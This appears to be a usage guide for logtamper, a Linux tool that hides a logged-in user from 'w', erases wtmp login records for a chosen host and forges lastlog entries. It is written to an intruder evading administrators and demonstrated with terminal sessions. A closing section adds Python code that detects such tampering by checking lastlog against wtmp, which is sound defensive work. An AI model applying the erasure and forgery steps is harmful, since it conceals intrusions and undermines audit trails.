Log cleanup under Linux: logtamper version 1.1

  
logtamper is a tool for modifying Linux log files. It preserves the log file's time information while modifying the file (atime is not changed; it is not necessary).

    [root@localhost logtamper]# ./logtamper-static
    Logtamper v 1.1 for linux
    logtamper [-f utmp_filename] -h username hostname
            hide username connected from hostname
    logtamper [-f wtmp_filename] -w username hostname
            erase username from hostname in wtmp file
    logtamper [-f lastlog_filename] -m username hostname ttyname YYYY[:MM[:DD[:hh[:mm[:ss]]]]]
            modify lastlog info

-f option: specifies the path of the file to be modified. It is optional. Since different systems store their logs in different paths, you can specify them manually. The default log locations are:

    #define UTMPFILE "/var/run/utmp"
    #define WTMPFILE "/var/log/wtmp"
    #define LASTLOGFILE "/var/log/lastlog"

-h option: sometimes you are logged in at the same time as the administrator, and the administrator can see you. The -h option hides you from the administrator's w. Before:

    [root@localhost logtamper]# w
     21:27:25 up 5 days, 13:48,  4 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    root     tty1     -                Fri14   18:24m  0.33s  0.33s -bash
    root     pts/3    192.168.80.1     21:21    6:22   0.04s  0.04s -bash
    root     pts/2    192.168.80.1     21:06    0.00s  0.13s  0.00s w
    root     pts/4    192.168.80.1     21:21    5:52   0.03s  0.03s -bash

We are connected from the 192.168.80.1 machine. Now hide:

    [root@localhost logtamper]# ./logtamper-static -h root 192.168.80.1
    Logtamper v 1.1 for linux
    Copyright (C) 2008 by xi4oyu <[email protected] >
    Seems you're invisible Now...Check it out!
    [root@localhost logtamper]# w
     21:27:46 up 5 days, 13:48,  1 user,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    root     tty1     -                Fri14   18:24m  0.33s  0.33s -bash
    [root@localhost logtamper]#

-w option: clears your login records. Existing Linux log-removal tools are very crude. This one can clear the logins that came from a particular host, selected by hostname.

    [root@localhost logtamper]# last
    root     tty1                          Wed Oct  1 21:30 - 21:30  (00:00)
    root     pts/4        192.168.80.1     Wed Oct  1 21:21   still logged in
    root     pts/3        192.168.80.1     Wed Oct  1 21:21   still logged in

    wtmp begins Wed Oct  1 06:01:46 2008

Clear the login records for 192.168.80.1:

    [root@localhost logtamper]# ./logtamper-static -w root 192.168.80.1
    Logtamper v 1.1 for linux
    Copyright (C) 2008 by xi4oyu <[email protected] >
    Aho,you are now invisible to last...Check it out!
    [root@localhost logtamper]# last
    root     tty1                          Wed Oct  1 21:30 - 21:30  (00:00)

    wtmp begins Wed Oct  1 06:01:46 2008
    [root@localhost logtamper]#

-m option: modifies the last-login location. We may notice this when logging in with ssh:

    login as: root
    Sent username "root"
    [email protected] 's password:
    Last login: Wed Oct 1 21:31:40 2008 from 192.168.80.45
    [root@localhost ~]#

If lastlog is not repaired, the administrator will be shown at the next login that the last login came from our machine's IP. You can edit this with the -m option:

    [root@localhost logtamper]# ./logtamper-static -m root 1.2.3.4 tty10 2008:1:1:1:1:1
    Logtamper v 1.1 for linux
    Copyright (C) 2008 by xi4oyu <[email protected] >
    Aho, now you never come here before...Check it out!
    [root@localhost logtamper]#
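Each option above edits one file (utmp, wtmp or lastlog) on its own, so after tampering the files tend to disagree with each other. The following is an added example, not part of logtamper or of the original page, that cross-checks a user's lastlog entry against the wtmp history. The record layouts assume glibc on x86_64 Linux; make_utmp, the slack parameter and all sample values are constructed for illustration.

```python
import struct
# Assumed layouts: glibc on x86_64 Linux (struct utmp = 384 bytes, struct lastlog = 292).
UTMP = struct.Struct("<h2xi32s4s32s256shhiii4i20s")
LASTLOG = struct.Struct("<i32s256s")
USER_PROCESS = 7  # ut_type of a login session record

def _s(raw):
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")

def parse_wtmp(data):
    """Return (user, line, host, tv_sec) for every login record in a wtmp image."""
    recs = []
    for off in range(0, len(data) - UTMP.size + 1, UTMP.size):
        f = UTMP.unpack_from(data, off)
        if f[0] == USER_PROCESS:
            recs.append((_s(f[4]), _s(f[2]), _s(f[5]), f[9]))
    return recs

def parse_lastlog(data, uid):
    """lastlog is an array indexed by UID; return (tv_sec, line, host) or None."""
    off = uid * LASTLOG.size
    if off + LASTLOG.size > len(data):
        return None
    t, line, host = LASTLOG.unpack_from(data, off)
    return (t, _s(line), _s(host)) if t else None

def cross_check(user, ll, recs, slack=5):
    """List disagreements between one user's lastlog entry and the wtmp history."""
    logins = [r for r in recs if r[0] == user]
    if ll is None:
        return ["wtmp has logins but lastlog is empty"] if logins else []
    t, line, host = ll
    findings = []
    if any(r[3] > t + slack for r in logins):
        findings.append("lastlog is older than the newest wtmp login")
    covered = bool(recs) and t >= min(r[3] for r in recs)
    if covered and not any(r[1] == line and r[2] == host and abs(r[3] - t) <= slack
                           for r in logins):
        findings.append("lastlog entry has no matching wtmp record")
    return findings

def make_utmp(user, line, host, t):  # constructed login record for the demo
    return UTMP.pack(USER_PROCESS, 0, line, b"", user, host, 0, 0, 0, t, 0, 0, 0, 0, 0, b"")

if __name__ == "__main__":
    # Constructed sample: wtmp keeps only the tty1 login, lastlog claims 1.2.3.4/tty10.
    wtmp = make_utmp(b"root", b"tty1", b"", 1222896600)
    lastlog = LASTLOG.pack(1199149261, b"tty10", b"1.2.3.4")
    print(cross_check("root", parse_lastlog(lastlog, 0), parse_wtmp(wtmp)))
```

A finding is a lead to investigate, not proof: some programs write wtmp without updating lastlog, and log rotation shortens the period wtmp covers. Because the tool restores the file's time information, the check relies on the records' contents and not on file timestamps.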